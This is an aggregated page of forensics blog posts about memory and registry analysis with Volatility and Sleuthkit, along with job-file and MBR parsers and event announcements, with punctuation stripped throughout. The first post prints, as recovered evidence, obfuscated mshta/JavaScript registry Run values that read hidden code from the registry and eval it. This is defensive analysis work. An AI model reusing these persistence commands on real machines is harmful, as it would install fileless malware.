http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2016-01-29 23:09:38 - JL's stuff : Recently someone had asked on a mailing list about how to extract the registry value names that were created by a particular piece of malware The issue was a NULL 0x0 character at the beginning of the registry value name, which prevented regedit from opening the registry key The name is actually there, however, and consists of this NULL character and some other hex numbers, and you are able to extract it from the raw registry itself from disk and memory We'll cover how we may accomplish these tasks, and then we'll cover how to accomplish this over the enterprise, as was asked as a followup question Background ---------- The malware in question is referenced in a report by Symantec as well as REAQTA We have two different registry values depending on whether or not Powershell is available on machine Either way, the registry keys and values created by the malware are present in the user's personal registry NTUSERDAT Extracting the Registry ----------------------- For this part, you may use anything that allows you to pull the registry file from the disk Some example tools may be FTK Imager X-Ways EnCase Sleuthkit or Autopsy if you need a GUI We're going to use the Sleuthkit to extract the registry file from the local disk in this case though the process would be the same for an offline or remote disk, just the disk name would differ So first we need to figure out the offset of the NTFS volume In order to accomplish that, we would use the mmls utility we see its invocation on line 1 below The volume offset is highlighted on line 9 and we see that it is the only NTFS volume on this disk Next, we need to get the unique identifying information inode for the NTUSERDAT registry file for the user who ran the malware lines 11-23 After we've identified the inode number for the registry file 372 , we then extract it from the disk so that we may process it offline line 26 1 mmls PhysicalDrive0 2 DOS Partition Table 3 Offset Sector 0 4 Units are in 512-byte sectors 5 6 Slot Start End Length Description 7 00 Meta 0000000000 0000000000 0000000001 Primary Table 0 8 01 ----- 0000000000 0000002047 0000002048 Unallocated 9 02 00 00 0000002048 0033552383 0033550336 NTFS 0x07 10 11 fls -o 2048 -p -r physicaldrive0 pathstxt 12 13 findstr i ntuser pathstxt 15 r r 10772-128-4 Users Default NTUSERDAT 6cced2f1-6e01-11de-8bed-001e0bcd1824 TMblf 16 r r 41237-128-3 Users Default NTUSERDAT 17 r r 41238-128-4 Users Default NTUSERDATLOG 18 r r 10768-128-4 Users Default NTUSERDATLOG1 19 r r 41321-128-1 Users Default NTUSERDATLOG2 20 r r 10563-128-4 Users Default NTUSERDAT 6cced2f1-6e01-11de-8bed-001e0bcd1824 TMContainer00000000000000000002regtrans-ms 21 r r 10773-128-4 Users Default NTUSERDAT 6cced2f1-6e01-11de-8bed-001e0bcd1824 TMContainer00000000000000000001regtrans-ms 22 r r 433-128-1 Users user NTUSERDAT 6cced2f1-6e01-11de-8bed-001e0bcd1824 TMblf 23 r r 372-128-1 Users user NTUSERDAT 24 snip 25 26 icat -o 2048 physicaldrive0 372 ntuser-win7x86 Print Keys and Values --------------------- Once we have the extracted registry file, we're able to print out the registry key and its values using any offline tool we have at our disposal Here are a few RegLookup Python-Registry RegRipper Mitec WRR RegLookup is a nice utility for printing out registry data You can see an example output of the Run key below, however, note that the value name is not printed out We are able to see everything else, however reglookup -p 'Software Microsoft Windows CurrentVersion Run' NTUSER-Win7x86DAT PATH,TYPE,VALUE,MTIME Software Microsoft Windows CurrentVersion Run,KEY,,2016-01-15 21 49 46 Software Microsoft Windows CurrentVersion Run ,SZ,mshta javascript roh0Urp x22ehdEAR8I x22 G9p newpourcents20ActiveXObject x22WScriptShell x22 c7r6vhuiFM x22moDW7uoJ5 x22 ibh29z G9pRegRead x22HKCU x5C x5Csoftware x5C x5Cf42603093a x5C x5C2e0575f8 x22 bZU38ElgI x229g95uXT x22 eval ibh29z v4SXZYYP x22x2 x22 , Software Microsoft Windows CurrentVersion Run ,SZ,mshta javascript hCLkQp43l x22GRB x22 w5s1 newpourcents20ActiveXObject x22WScriptShell x22 dXx1Yr6f x22uk x22 S6RUd w5s1RegRead x22HKCU x5C x5Csoftware x5C x5Cf42603093a x5C x5C2e0575f8 x22 JTMRIu3 x227Vi x22 eval S6RUd Jkxju49At x225S x22 , I also wrote a script to use Python-Registry in order to print out registry keys of interest You can see example output from this below python printkeypy NTUSER-Win7x86DAT Software Microsoft Windows CurrentVersion Run Processing NTUSER-Win7x86DAT cmi-createhive 6a1c4018-979d-4291-a7dc-7aed1c75b67c software microsoft windows currentversion run VALUENAME 996883f7 VALUE mshta javascript roh0Urp ehdEAR8I G9p newpourcents20ActiveXObject WScriptShell c7r6vhuiFM moDW7uoJ5 ibh29z G9pRegRead HKCU software f42603093a 2e0575f8 bZU38ElgI 9g95uXT eval ibh29z v4SXZYYP x2 VALUENAME e4263fbd VALUE mshta javascript hCLkQp43l GRB w5s1 newpourcents20ActiveXObject WScriptShell dXx1Yr6f uk S6RUd w5s1RegRead HKCU software f42603093a 2e0575f8 JTMRIu3 7Vi eval S6RUd Jkxju49At 5S Subkeys Harlan Carvey also wrote a RegRipper plugin to detect key and value names with NULL characters Also, if you need a GUI, Eric Zimmerman's registry tool also parses out these names correctly So in short, you have a lot of options for parsing out these broken value names with offline tools Printing Keys and Values Using Volatility ----------------------------------------- As you may guess, you can also get this information using Volatility, but it might not be as straightforward at first For our first attempt, we will try to use the printkey plugin Notice that the value name is actually blank in the output below left side of the colon python volpy -f Win7x86vmem --profile Win7SP1x86 printkey -K software microsoft windows currentversion run Volatility Foundation Volatility Framework 25 Legend S Stable V Volatile ---------------------------- snip Registry C Users user ntuserdat Key name Run S Last updated 2016-01-15 21 49 45 UTC 0000 Subkeys Values REG_SZ S mshta javascript roh0Urp ehdEAR8I G9p newpourcents20ActiveXObject WScriptShell c7r6vhuiFM moDW7uoJ5 ibh29z G9pRegRead HKCU software f42603093a 2e0575f8 bZU38ElgI 9g95uXT eval ibh29z v4SXZYYP x2 REG_SZ S mshta javascript hCLkQp43l GRB w5s1 newpourcents20ActiveXObject WScriptShell dXx1Yr6f uk S6RUd w5s1RegRead HKCU software f42603093a 2e0575f8 JTMRIu3 7Vi eval S6RUd Jkxju49At 5S This is because of the way the String class was written The actual name is still there, however, so we can extract it with volshell In the code below, lines 4-7 import the RegistryApi to use the correct registry file in this case the user name user Line 8 gets the key of interest, the Run key defined on line 6 Then lines 10-11 loop through the raw values contained for that key and print out the dt function output for each value We can see on lines 15 and 25 that each of these value names have a length of 9, therefore, we should be able to extract a name for these values We are able to see the raw value for this name by using the v function on the object of interest In this case, we'll use it on the Name member of the value On lines 34-35, we can see that we get the correct length for the value name and on lines 36-37 we get the correct value name We can then rerun our loop on line 39 in order to get the full information for these values 1 python volpy -f Win7x86vmem --profile Win7SP1x86 volshell 2 snip 3 4 In 1 import volatilitypluginsregistryregistryapi as registryapi 5 In 2 regapi registryapiRegistryApi self_config 6 In 3 key software microsoft windows currentversion run 7 In 4 regapiset_current NTUSERDAT , user 8 In 5 item regapireg_get_key None, key 9 10 In 6 for value, data in regapireg_yield_values None, key, given_root item, raw True 11 print dt value 12 13 14 0x0 Signature vk 15 0x2 NameLength 9 16 0x4 DataLength 412 17 0x8 Data 511024 18 0xc Type 1 19 0x10 Flags 1 20 0x12 Spare 28515 21 0x14 Name 22 None 23 24 0x0 Signature vk 25 0x2 NameLength 9 26 0x4 DataLength 378 27 0x8 Data 517464 28 0xc Type 1 29 0x10 Flags 1 30 0x12 Spare 0 31 0x14 Name 32 None 33 34 In 7 len valueNamev 35 Out 7 9 36 In 8 print str valueNamev 37 e4263fbd 38 39 In 9 for value, data in regapireg_yield_values None, key, given_root item, raw True print valueNamev , data 996883f7 mshta javascript roh0Urp ehdEAR8I G9p newpourcents20ActiveXObject WScriptShell c7r6vhuiFM moDW7uoJ5 ibh29z G9pRegRead HKCU software f42603093a 2e0575f8 bZU38ElgI 9g95uXT eval ibh29z v4SXZYYP x2 e4263fbd mshta javascript hCLkQp43l GRB w5s1 newpourcents20ActiveXObject WScriptShell dXx1Yr6f uk S6RUd w5s1RegRead HKCU software f42603093a 2e0575f8 JTMRIu3 7Vi eval S6RUd Jkxju49At 5S Unfortunately, that's all the time we have for today, but we'll continue this thought sometime next week Until then, here's a bit of homework for you to watch and a bit to read Coming up next Finding interesting registry values Enterprise-wide http://www.secuobs.com/revue/news/596915.shtmlhttp://www.secuobs.com/revue/news/596915.shtml Secuobs.com : 2015-06-03 18:44:43 - JL's stuff - Since someone had asked about it in a comment on this blog, I decided to write up a Volshell Quickie on the Volatility Labs blog Enjoy http://www.secuobs.com/revue/news/572916.shtmlhttp://www.secuobs.com/revue/news/572916.shtml Secuobs.com : 2015-05-20 20:00:22 - JL's stuff - https googl TSede9 http://www.secuobs.com/revue/news/571429.shtmlhttp://www.secuobs.com/revue/news/571429.shtml Secuobs.com : 2015-05-18 20:53:15 - JL's stuff - In case you didn't catch it on the Volatility Labs blog, I found an interesting bug that we've had in the framework since we've had Linux support If you've had cases that involved Linux samples and plugins like linux_yarascan, linux_strings etc, you might want to update to the latest code and have another look over those samples Of course, there's no reason to think that a piece of malware might have used this trick and used a sigsegv handler to access the data, but the idea has been around for years http://www.secuobs.com/revue/news/571136.shtmlhttp://www.secuobs.com/revue/news/571136.shtml Secuobs.com : 2015-01-29 18:03:27 - JL's stuff - Wow, it's been a while since I've written here A lot has happened since, however Here are a few updates The Book -------- We released a book The Art of Memory Forensics For those of you who are considering teaching memory forensics or even operating systems, we have a syllabus and evidence files on our website that you may use in your classes IMAGE Trainings --------- We have several trainings in line for this year, public and private Public trainings currently include Reston, VA April 13th-17th 2015 New York, NY May 11th-15th 2015 Amsterdam, NL August 31st-September 4th 2015 We are also currently working on new course offerings coming out this year So keep an eye out for those Talks ----- I'll be speaking at the upcoming CEIC conference in Las Vegas, on Wednesday May 20th 2015 Apparently there is a discount code if you register before January 31st JANS4v15 The Volatility team will also give another talk at NYC4SEC during the week of the training in NYC this coming May More details will be given for that talk soon http://www.secuobs.com/revue/news/557160.shtmlhttp://www.secuobs.com/revue/news/557160.shtml Secuobs.com : 2014-04-15 00:52:49 - JL's stuff - The Volatility team will give a talk at the next NYC4SEC meetup on memory forensics on May 8th, 2014 at John Jay College Make sure to RSVP if you are planning to attend, since there is limited seating Thanks For the Memory Rootkits, Exfil and APT - RAM Conquers All The ability to perform digital investigations and incident response is becoming a critical skill for many occupations Unfortunately, digital investigators frequently lack the training or experience to take advantage of the volatile artifacts found in physical memory Volatile memory contains valuable information about the runtime state of the system, provides the ability to link artifacts from traditional forensic analysis network, file system, registry , and provides the ability to ascertain investigative leads that have been unbeknownst to most analysts Malicious adversaries have been leveraging this knowledge disparity to undermine many aspects of the digital investigation process with such things as anti-forensics techniques, memory resident malware, kernel rootkits, encryption file systems, network traffic, etc , and Trojan defenses The only way to turn-the-tables and defeat a creative digital human adversary is through talented analysts This talk demonstrates the importance of including Volatile memory in your investigations with an overview of the most widely used memory forensics tool, Volatility, by its developers - gleeda http://www.secuobs.com/revue/news/508256.shtmlhttp://www.secuobs.com/revue/news/508256.shtml Secuobs.com : 2014-02-07 15:57:38 - JL's stuff - We have a new website for all of our Volatility training opportunities Don't forget to check it out http wwwmemoryanalysisnet - gleeda http://www.secuobs.com/revue/news/496610.shtmlhttp://www.secuobs.com/revue/news/496610.shtml Secuobs.com : 2014-01-30 15:07:35 - JL's stuff - In case you missed it, I put up my slides for my OMFW 2013 talk Every Step You Take Profiling the System You can find them here on google docs Some of the animations may not render properly, even if played, but you get the idea If you want to see the cyboxer plugin, send me an email jamielevy at gmail com http://www.secuobs.com/revue/news/495033.shtmlhttp://www.secuobs.com/revue/news/495033.shtml Secuobs.com : 2013-04-19 18:13:26 - JL's stuff - I have several speaking and training events that are coming up this year that may be of interest to others in the community I will be speaking at the New York Banker's Association's upcoming Annual Technology, Compliance Risk Management Forum on May 16th, 2013 on the topic of Incident Response and Digital Forensics If you plan to attend I'll see you there Also we Volatility are holding our third run of Windows Malware and Memory Forensics in Reston, VA from Monday June 10th through Friday, June 14th 2013 This training will not disappoint even the most proficient of forensic malware analysts It includes real-world scenarios that are reinforced with hands-on labs All students will leave with skills and confidence to conduct investigations involving RAM samples from acquisition to the final report Students also leave with more than just being Volatility power users, they leave with a deeper knowledge of memory forensics and malware analysis methodologies Such knowledge is integral regardless of what tools you choose for future investigations, be they open source or commercial, and much more powerful than simply run this tool, the output is colored red so it's bad You'll leave the class with knowledge that will help you to figure out if something really is bad or not There are still a few seats left for this training, so if you are interested you should register soon Send an email to voltraining at memoryanalysisnet for registration information If you are looking for a course that covers both disk and memory forensics, Andrew Case and I will teach our course in Digital Forensics and Incident Response again this summer at Black Hat Vegas This course runs from July 27th through July 30th 2013 and will cover enough material to take someone from knowing practically nothing about digital forensics to a point where s he can comfortably conduct his her own investigations Also we Volatility will hold another run of Windows Malware and Memory Forensics in the Netherlands from Monday September 9th through Friday, September 13th 2013 Details will appear soon on the Volatility Labs blog Planning for the Open Memory Forensics Workshop OMFW is in progress You should plan to attend if you want to know what's new and hot in the memory forensics space OMFW is scheduled to take place on November 4th, 2013 one day prior to the Sleuth Kit and Open Source Digital Forensics Conference Final details will appear soon on the Volatility Labs blog http://www.secuobs.com/revue/news/440658.shtmlhttp://www.secuobs.com/revue/news/440658.shtml Secuobs.com : 2013-01-14 22:15:43 - JL's stuff - Cross posted from the Volatility Labs Blog We are pleased to announce the 1st Annual Volatility Plugin Contest This contest is inspired and modeled after the Hex-Rays Plugin Contest As in the case of IDA, Volatility was designed with the belief that talented analysts should only be limited by their creativity not the tools they use In this spirit, Volatility has a flexible architecture that can be extended in numerous ways analysis plugins operating system plugins, application plugins, etc , volshell commands, address spaces, profiles, or user interfaces This contest is intended to inspire people to demonstrate their creativity, become a memory analysis pioneer, win the admiration of your peers, and give back to the community The contest is straightforward Create an innovative and useful extension to The Volatility Framework and win the contest 1st place wins one free seat at any future Windows Malware and Memory Forensics Training or 1500 USD cash 2nd place wins 500 USD cash 3rd place wins 250 USD cash 4th and 5th place wins Volatility swag T-shirts, Stickers, etc Everyone but the Volatility core developers can participate Rules of Engagement 1 The goal of the contest is to create innovative, interesting, and useful extensions for The Volatility Framework While extensions written in Python are preferred, extensions written in other languages will also be considered 2 The submitted extensions should work with the Volatility 22 or greater release and should have been implemented after the initial contest announcement 1 14 2013 3 The top 5 winners of the contest will get the prizes mentioned above 4 Volatility core developers are not eligible 5 Submissions should be sent to volcon2013 memoryanalysisnet The submission should include the source code, a short description of how the extension is used, and a signed Individual Contributor License Agreement 6 By submitting an entry, you declare that you own the copyright to the source code and are authorized to submit it 7 All submissions should be received no later than August 1, 2013 The winner will be announced the following week We recommend submitting early In the case of similar submissions, preference will be shown to early submissions 8 The Volatility Project core developers will decide the winners based on the following criteria creativity, usefulness, effort, completeness, submission date, and clarity of documentation 9 In order to collect the cash prizes, the winner will need to provide a legal picture identification and bank account information within 30 days of notification The bank transfer will be made within two weeks after the winner is authenticated 10 Group entries are allowed the prize will be paid or seat will be registered, if the training option is desired to the person designated by the group 11 Upon approval from the winners, their names aliases will be listed on the Volatility Hall of Fame web page for the world to admire 12 Selected contestants may also be asked to present their work at the 2013 Open Memory Forensics Workshop or have their research featured on the Volatility Labs Blog Acknowledgements A special thanks goes out to the Hex-Rays team for providing the inspiration and template for this contest http://www.secuobs.com/revue/news/421708.shtmlhttp://www.secuobs.com/revue/news/421708.shtml Secuobs.com : 2013-01-14 22:15:43 - JL's stuff - Cross posted from the Volatility Labs Blog The next journey to the center of Windows Memory Forensics starts in Chicago this March We are pleased to announce the second public offering of the Windows Malware and Memory Forensics Training by The Volatility Project This is the only memory forensics course officially designed, sponsored, and taught by the Volatility developers One of the main reasons we made Volatility open-source is to encourage and facilitate a deeper understanding of how memory analysis works, where the evidence originates, and how to interpret the data collected by the framework's extensive set of plugins Now you can learn about these benefits first hand from the developers of the most powerful, flexible, and innovative memory forensics tool Appraisal from your peers who attended the first course this past December IMAGE Please see the following details about the upcoming training event Dates Monday, March 18th through Friday, March 22nd 2013 Location Downtown Chicago, IL exact location will be shared upon registration Instructors Michael Ligh iMHLv2 , Andrew Case attrc , Jamie Levy gleeda For more information about the course, view the Volatility Training Flyer to download a copy of the PDF, click File Download To request a link to the online registration site or to receive a detailed course agenda outline, please send an email voltraining at memoryanalysisnet http://www.secuobs.com/revue/news/421707.shtmlhttp://www.secuobs.com/revue/news/421707.shtml Secuobs.com : 2012-11-13 19:53:14 - JL's stuff - I will be teaching a full day course on Windows Forensics and IR at Annual Computer Security Applications Conference ACSAC on December 4th at the Buena Vista Palace Hotel Spa in Orlando, FL There is still time to sign up for the conference and or training and it looks like a good program this year http://www.secuobs.com/revue/news/411183.shtmlhttp://www.secuobs.com/revue/news/411183.shtml Secuobs.com : 2012-09-30 02:08:32 - JL's stuff - Cross listed from Andrew Case's blog I was writing to announce that week 3 of the month of Volatility plugins is finished, and we now have five more in-depth blog posts covering Windows and Linux internals and rootkit detection as well as a bonus plugin that analyzes Internet Explorer browsing history These have all been posted on the Volatility Labs blog Post 1 Detecting Malware Hooks in the Windows GUI Subsystem This Windows focused post covers detecting malware hooks in the Windows GUI subsystem, including message hooks and event hooks, and what effects these hooks can have on a compromised system http volatility-labsblogspotcom 2012 09 movp-31-detecting-malware-hooks-inhtml Post 2 Shellbags in Memory, SetRegTime, and TrueCrypt Volumes This Windows focused post covers finding and recovering shellbags from memory, the forensics importance of shellbags, and analyzes the effects of anti-forensics on shellbag timestamps It concludes with covering the traces left in shellbags by TrueCrypt http volatility-labsblogspotcom 2012 09 movp-32-shellbags-in-memory-setregtimehtml Post 3 Analyzing USER Handles and the Win32ksys Gahti This Windows focused post introduces two new plugins, one named gahti that determines the various different types of USER objects on a system and another named userhandles which traverses the handle table entries and associates them with the owning processes or threads http volatility-labsblogspotcom 2012 09 movp-33-analyzing-user-handles-andhtml Post 4 Recovering tagCLIPDATA What's In Your Clipboard This Windows focused post covers recovery of the Windows clipboard from physical memory http volatility-labsblogspotcom 2012 09 movp-34-recovering-tagclipdata-whats-inhtml Post 5 Analyzing the 2008 DFRWS Challenge with Volatility This Linux focused post analyzes the 2008 memory challenge with Volatility It walks through the artifacts produced by the winning team and shows how to recover the same information with Volatility It then shows plugins in Volatility that can recover artifacts not produced by the winning team http volatility-labsblogspotcom 2012 09 movp-35-analyzing-2008-dfrws-challengehtml Bonus Post HowTo Scan for Internet Cache History and URLs This Windows focused post covers how to recover Internet Explorer's cache and history from a memory sample http volatility-labsblogspotcom 2012 09 howto-scan-for-internet-cachehistoryhtml If you have any questions or comments on the posts, please leave a comment on the respective post on the Volatility Labs blog http://www.secuobs.com/revue/news/402600.shtmlhttp://www.secuobs.com/revue/news/402600.shtml Secuobs.com : 2012-09-21 17:25:19 - JL's stuff - It's been an exciting week in the Volatility community We've just finished our second week of Month of Volatility Plugins MoVP blogposts, released Volatility 22 RC2 for testing, fixed a few minor bugs and now we're gearing up for our third week of posts and the upcoming Open Memory Forensics Workshop OMFW Here is a list of this week's posts, compiled by Andrew Case I was writing to announce that week 2 of the month of Volatility plugins is finished, and we now have five more in-depth blog posts covering Windows and Linux internals and rootkit detection These have all been posted to the new Volatility Labs blog Post 1 Atoms The New Mutex , Classes and DLL Injection This Windows focused post covers investigating malware and understanding infections by analyzing the atom tables http volatility-labsblogspotcom 2012 09 movp-21-atoms-new-mutex-classes-and-dllhtml Post 2 Malware in your Windows This Windows focused post covers enumerating and analyzing windows in the GUI subsystem http volatility-labsblogspotcom 2012 09 movp-22-malware-in-your-windowshtml Post 3 Event logs and Service SIDs This Windows focused post demonstrates recovering event logs from memory and calculating service SIDs http volatility-labsblogspotcom 2012 09 movp-23-event-logs-and-service-sidshtml Post 4 Analyzing the Jynx rootkit and LD_PRELOAD This Linux focused post covers analyzing the Jynx rootkit as well as generic methods for analyzing LD_PRELOAD based rootkits http volatility-labsblogspotcom 2012 09 movp-24-analyzing-jynx-rootkit-andhtml Post 5 Investigating In-Memory Network Data with Volatility This Linux focused post goes through each of the Linux Volatility plugins related to recovering network data from memory, such as network connections, packets, and the routing cache http volatility-labsblogspotcom 2012 09 movp-25-investigating-in-memory-networkhtml If you have any questions or comments on the posts, please leave a comment on the respective post on the Volatility Labs blog We hope you've enjoyed this week's series Stay tuned, we have much more in store http://www.secuobs.com/revue/news/401084.shtmlhttp://www.secuobs.com/revue/news/401084.shtml Secuobs.com : 2012-09-14 19:24:44 - JL's stuff - I'm going to borrow from Andrew's blog here to let you know about our Month of Volatility Plugins I was writing to announce that week 1 of the month of Volatility plugins is finished, and we now have five in-depth blog posts covering Windows and Linux internals and rootkit detection These have all been posted to the new Volatility Labs blog Post 1 Logon Sessions, Processes, and Images This Windows focused post covers linking processes to their logon session, detecting hidden processes using session structures, and determining the loaded the drivers mapped into each session http volatility-labsblogspotcom 2012 09 movp-11-logon-sessions-processes-andhtml Post 2 Window Stations and Clipboard Malware This Windows focused post covers enumerating and analyzing window stations and clipboard monitoring malware http volatility-labsblogspotcom 2012 09 movp-12-window-stations-and-clipboardhtml Post 3 Desktops, Heaps, and Ransomware This Windows focused post covers finding rogue desktops used to hide applications and created by ransomware, linking threads to desktops, analyzing the desktop heap for memory corruptions, and profiling heap allocations to locate USER objects http volatility-labsblogspotcom 2012 09 movp-13-desktops-heaps-and-ransomwarehtml Post 4 Average Coder Rootkit, Bash History, and Elevated Processes This Linux focused post covers analyzing the Average Coder rootkit, recovering bash_history from memory, even when faced with anti-forensics, and finding elevated processes http volatility-labsblogspotcom 2012 09 movp-14-average-coder-rootkit-bashhtml Post 5 KBeast Rootkit, Detecting Hidden Modules, and sysfs This Linux focused post covers analyzing the KBeast rootkit, finding modules unlinked from the module list, and the forensic values of sysfs http volatility-labsblogspotcom 2012 09 movp-15-kbeast-rootkit-detecting-hiddenhtml If you have any questions or comments on the posts, please leave a comment on the respective post on the Volatility Labs blog Future Volatility posts will appear on our official blog http volatility-labsblogspotcom Also you might want to follow our project on twitter Volatility for updates and news See you at OMFW http://www.secuobs.com/revue/news/399729.shtmlhttp://www.secuobs.com/revue/news/399729.shtml Secuobs.com : 2012-09-02 01:49:47 - JL's stuff - While writing material for the Blackhat training course that Andrew Case and I gave this summer, I realized that there did not appear to be many tools that would parse job files At that time, Harlan Carvey had written a blogpost on job files and had mentioned them in as part of his timeline materials, but he had not yet released his Perl script It has since been released here This prompted me to write up a parser of my own in Python job files consist of two sections 1 Fixed Length and 2 Variable Length The MSDN documentation is fairly good for letting us know how to parse out these sections So what does a job file look like xxd At5job 0000000 0006 0100 e378 73f7 4d8b 2a45 a589 1cc5 xsM E 0000010 fa64 cfd2 4600 cc00 0000 0000 3c00 0a00 dF 0 User Name Length 0x7 User Name SYSTEM Comment Length 0x1e Comment if Comment length 0 - Created by NetScheduleJobAdd User Data Reserved data Trigger count Triggers - Scheduled date Jul 16 11 26 000 2012 Job Signature So I am releasing a job file parser script that can parse out almost all of these items mentioned above You can find it here The only things left off are the user reserved data, some of the trigger data and the job signature sections I have only tested this on 32 bit nix systems, so let me know if you hit issues on another platforms You can see an example output of the above job file below python jobparserpy -f At5job Product Info Windows Vista File Version 1 UUID F77378E3-8B4D-452A-A589-1CC5FA64CFD2 Maximum Run Time 72 00 000 HH MM SSMS Exit Code 0 Status Properties not set Flags TASK_FLAG_DONT_START_IF_ON_BATTERIES Date Run Monday Jul 16 11 26 0015 2012 Running Instances 0 Application cmd Parameters c notepadexe Working Directory Working Directory not set User SYSTEM Comment Created by NetScheduleJobAdd Scheduled Date Jul 16 11 26 000 2012 Here is some output of job files taken from a Windows 2008 machine python jobparserpy -d Tasks File Tasks At1job Product Info Windows Vista File Version 1 UUID CE14B659-4115-4263-BFAD-A8318428AB68 Maximum Run Time 72 00 000 HH MM SSMS Exit Code 0 Status Properties not set Flags TASK_FLAG_DONT_START_IF_ON_BATTERIES Date Run Task not yet run Running Instances 0 Application notepadexe Working Directory Working Directory not set User SYSTEM Comment Created by NetScheduleJobAdd Scheduled Date Jul 17 02 20 000 2012 File Tasks At2job Product Info Windows Vista File Version 1 UUID 46F61E52-4581-49A9-9AD0-2244C206AEEB Maximum Run Time 72 00 000 HH MM SSMS Exit Code 0 Status Properties not set Flags TASK_FLAG_DONT_START_IF_ON_BATTERIES Date Run Task not yet run Running Instances 0 Application notepadexe Working Directory Working Directory not set User SYSTEM Comment Created by NetScheduleJobAdd Scheduled Date Jul 16 14 20 000 2012 And here are a couple of XP Tasks, notice that one has Running Instances value of 1 , this was copied when the command was currently running File Solitairejob Product Info Windows XP File Version 1 UUID 3824DDBB-A037-4016-B99A-28BD95D429AF Maximum Run Time 72 00 000 HH MM SSMS Exit Code 0 Status Task has not run Flags TASK_FLAG_INTERACTIVE, TASK_FLAG_DELETE_WHEN_DONE Date Run Monday Aug 13 12 37 0010 2012 Running Instances 1 Application C WINDOWS system32 solexe Working Directory C WINDOWS system32 User user Comment Comment not set Scheduled Date Aug 13 12 37 000 2012 File Solitaire2job Product Info Windows XP File Version 1 UUID 3824DDBB-A037-4016-B99A-28BD95D429AF Maximum Run Time 72 00 000 HH MM SSMS Exit Code 0 Status Task is ready to run Flags TASK_FLAG_INTERACTIVE, TASK_FLAG_DELETE_WHEN_DONE Date Run Monday Aug 13 12 37 0010 2012 Running Instances 0 Application C WINDOWS system32 solexe Working Directory C WINDOWS system32 User user Comment Comment not set Scheduled Date Aug 13 12 37 000 2012 References 1 Windows Forensic Analysis 2nd Ed, Harlan Carvey 2 JOB File Format, http msdnmicrosoftcom en-us library cc248285pourcents28v prot13pourcents29aspx 3 Windows Scheduler at job Forensics, http computer-forensicssansorg blog 2009 09 16 windows-scheduler-at-job-forensics http://www.secuobs.com/revue/news/397208.shtmlhttp://www.secuobs.com/revue/news/397208.shtml Secuobs.com : 2012-04-22 03:20:50 - JL's stuff - With the increase in MBR infectors, I've decided to release a script I wrote that parses the MBR as well as hashes and disassembles the bootcode I've found that MBR bootcode is pretty stable across systems of the same OS, so this script should allow you to quickly check for any discrepancies on a system You of course need Python and Distorm to use this script A shortened example output can be seen below python mbr_parserpy -f mbrbin Disk signature 96-80-96-80 Bootcode md5 4ad444d4e7efce9485a94186c3f4b157 Bootcode Disassembly 00000000 33c0 XOR EAX, EAX 00000002 8ed0 MOV SS, AX 00000004 bc007cfb50 MOV ESP, 0x50fb7c00 00000009 07 POP ES 0000000a 50 PUSH EAX 0000000b 1f POP DS 0000000c fc CLD 0000000d 50 PUSH EAX 0000000e be007cbf00 MOV ESI, 0xbf7c00 00000013 06 PUSH ES 00000014 b90002f3a4 MOV ECX, 0xa4f30200 00000019 bf1e0657cb MOV EDI, 0xcb57061e 0000001e b441 MOV AH, 0x41 00000020 b280 MOV DL, 0x80 00000022 bbaa55cd13 MOV EBX, 0x13cd55aa 00000027 81fb55aa7530 CMP EBX, 0x3075aa55 0000002d f6c101 TEST CL, 0x1 00000030 742b JZ 0x5d 00000032 be0008c704 MOV ESI, 0x4c70800 00000037 1000 ADC EAX , AL 00000039 c744020600c74404 MOV DWORD EDX EAX 0x6 , 0x444c700 snip 000001b2 0000 ADD EAX , AL 000001b4 002c44 ADD ESP EAX 2 , CH 000001b7 63 DB 0x63 Partition Table 1 Boot flag 0x80 Bootable Partition type 0x7 NTFS Starting Sector LBA 0x3f 63 Starting CHS Cylander 0 Head 1 Sector 1 Ending CHS Cylander 520 Head 254 Sector 63 Size in sectors 0x7fb68a 8369802 Partition Table 2 Boot flag 0x0 Partition type 0x0 Empty Starting Sector LBA 0x0 0 Starting CHS Cylander 0 Head 0 Sector 0 Ending CHS Cylander 0 Head 0 Sector 0 Size in sectors 0x0 0 Partition Table 3 Boot flag 0x0 Partition type 0x0 Empty Starting Sector LBA 0x0 0 Starting CHS Cylander 0 Head 0 Sector 0 Ending CHS Cylander 0 Head 0 Sector 0 Size in sectors 0x0 0 Partition Table 4 Boot flag 0x0 Partition type 0x0 Empty Starting Sector LBA 0x0 0 Starting CHS Cylander 0 Head 0 Sector 0 Ending CHS Cylander 0 Head 0 Sector 0 Size in sectors 0x0 0 The script can be found here http://www.secuobs.com/revue/news/371293.shtmlhttp://www.secuobs.com/revue/news/371293.shtml Secuobs.com : 2012-03-23 21:07:56 - JL's stuff - Yet another interesting upcoming talk at John Jay College on Tuesday March 27, 2012 Center for Cybercrime Studies John Jay College of Criminal Justice presents For a Free Digital Society Dr Richard Stallman President Free Software Foundation Abstract Activities directed at including'' more people in the use of digital technology are predicated on the assumption that such inclusion is invariably a good thing It appears so, when judged solely by immediate practical convenience However, if we also judge in terms of human rights, whether digital inclusion is good or bad depends on what kind of digital world we are to be included in If we wish to work towards digital inclusion as a goal, it behooves us to make sure it is the good kind Richard Stallman launched the free software movement in 1983 and started the development of the GNU operating system see wwwgnuorg in 1984 GNU is free software everyone has the freedom to copy it and redistribute it, with or without changes The GNU Linux system, basically the GNU operating system with Linux added, is used on tens of millions of computers today Stallman has received the ACM Grace Hopper Award, a MacArthur Foundation Fellowship, the Electronic Frontier Foundation's Pioneer Award, and the Takeda Award for Social Economic Betterment, as well as several honorary doctorates Date Tuesday, March 27, 2012 Time 1 30 PM Location L61 Conference Center New Building John Jay College of Criminal Justice 899 Tenth Avenue New York, NY RSVP Nicole Daniels at 212-237-8920 or email ndaniels jjaycunyedu For additional information please contact Professor Doug Salane, Director of the Center for Cybercrime Studies, 212-237-8836 or email dsalane jjaycunyedu For additional Center for Cybercrime Studies events visit our web site Go to WWWJJAYCUNYEDU , ACADEMICS, RESEARCH CENTERS and INSTITUTES http://www.secuobs.com/revue/news/365773.shtmlhttp://www.secuobs.com/revue/news/365773.shtml Secuobs.com : 2012-03-22 22:51:20 - JL's stuff - I know I haven't written much in the last few months I've been busy Even though I'm writing a blogpost today it's still going to be pretty short this is because most of what I have to say has already been written up in documentation ahead of time Today I'm releasing an EnScript that allows you to compare two disk images using various options The purpose of this EnScript is to find differences on a machine after some event, such as infection, software installation etc has taken place I'm also releasing the source in hopes that others will be able to troubleshoot or expand it themselves as needed I offer no warranties for this script nor promises that it is beautiful code in all reality this was written hastily out of necessity , this is as-is and has worked well enough for me for my purposes Unlike most of my stuff, I actually took time to create a GUI for it, however, to make it easier to use Information on how it works can be found in the documentation pdf so I will not cover it here Hopefully someone out there will find it useful Please feel free 